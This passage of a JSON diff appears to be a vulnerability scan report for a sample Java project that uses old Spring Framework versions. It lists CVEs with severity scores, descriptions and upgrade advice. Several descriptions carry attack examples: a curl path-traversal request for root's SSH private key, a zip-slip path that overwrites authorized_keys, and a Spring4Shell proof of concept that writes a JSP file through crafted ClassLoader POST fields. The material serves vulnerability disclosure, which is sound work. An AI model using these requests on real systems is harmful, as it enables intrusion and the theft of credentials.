Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": 
"2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": 
"org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": 
"spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + 
"format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + 
"title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob 
Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": 